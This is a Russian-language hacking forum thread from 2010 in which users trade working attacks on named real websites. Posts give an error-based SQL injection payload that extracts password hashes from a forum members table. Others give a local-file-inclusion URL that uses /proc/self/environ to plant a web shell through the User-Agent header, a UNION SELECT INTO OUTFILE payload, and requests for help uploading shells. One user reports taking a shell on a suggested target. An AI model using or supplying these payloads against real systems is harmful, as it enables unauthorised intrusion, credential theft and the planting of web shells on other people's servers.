02.07.2010, 17:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от #Wolf#
спасибо, но
символ "_" не пускает?
Странно, ведь information_schema пропустил же.
|
|
|
02.07.2010, 17:52
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Сообщение от Ctacok
Странно, ведь information_schema пропустил же.
да, вот что заметил, нормально могу читать все таблы, кроме тех, который начинаются на ibf_ .
Хотя структуру их я могу смотреть, а "get data" нет =(
есть мысли?
|
|
|
|
02.07.2010, 18:04
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
#Wolf#, попробуй -
Код:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
-------------------
Сообщение от CyberHunter
Скажите как можно залить шелл через LFI?
Вот например
тут
И какие нужны права на это? Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее тут
_http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00
в User-Agent пишешь код шелла.
-------------------
Сообщение от SeNaP
как быть тут?
http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10
http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=4 -> false
http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=5 -> true
|
|
|
|
02.07.2010, 18:04
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Скажите как можно залить шелл через LFI?
Вот например тут
И какие нужны права на это? |
|
|
|
02.07.2010, 19:20
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
#Wolf#,
попробуй -
Код:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
нет такой таблицы. версия 1.3.1
|
|
|
|
02.07.2010, 22:24
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Как правильно составить двойной запрос?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select COUNT(CODE) as count1 from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'count1'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from tbl_subkat where KATCODE="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" order by POSITION, NAZV"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn1[/COLOR][COLOR="#007700"]);
while (([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]))!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"tbl_base where ISMODER=1 and (SUBKAT1="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT2="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT3="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]")"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]' ('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
-1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f 757466696c652b5c27312e7478745c272d2d
http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b3 12b696e746f2b6f757466696c652b5c27312e7478745c272d2 d,2,version(),4-- |
|
|
|
02.07.2010, 23:18
|
|
Новичок
Регистрация: 10.06.2010
Сообщений: 1
С нами:
8379226
Репутация:
0
|
|
Имеется доступ фтп к серверу (Topserver),
как узнать директорию доступную на запись (или поменять права на запись) и залить шел
если можно попобробней, а то я в этом не особо опытный!
|
|
|
|
03.07.2010, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Farboud
Имеется доступ фтп к серверу (Topserver),
как узнать директорию доступную на запись (или поменять права на запись) и залить шел
если можно попобробней, а то я в этом не особо опытный!
чет не понял...есть фтп доступ и нет прав на заливку? чет нереально
|
|
|
|
03.07.2010, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от CyberHunter
Скажите как можно залить шелл через LFI?
Вот например
тут
И какие нужны права на это? Спасибо, классный инклуд.
Я зашеллил
Подсказка: енвирон
|
|
|
|
03.07.2010, 00:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Dare
http://bible.com/bibleanswers_result.php?id=155%27+union+select+1,2 ,3,4,5,6,7,8,9--+
не могу вывести поля.
ни кто не подскажет в чем трабла?
критику принимаю достойно...
а кто сказал что должны всегда быть принтабельные поля?...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2233859){kind=avatar}
Похожие темы
Комбинированный вид
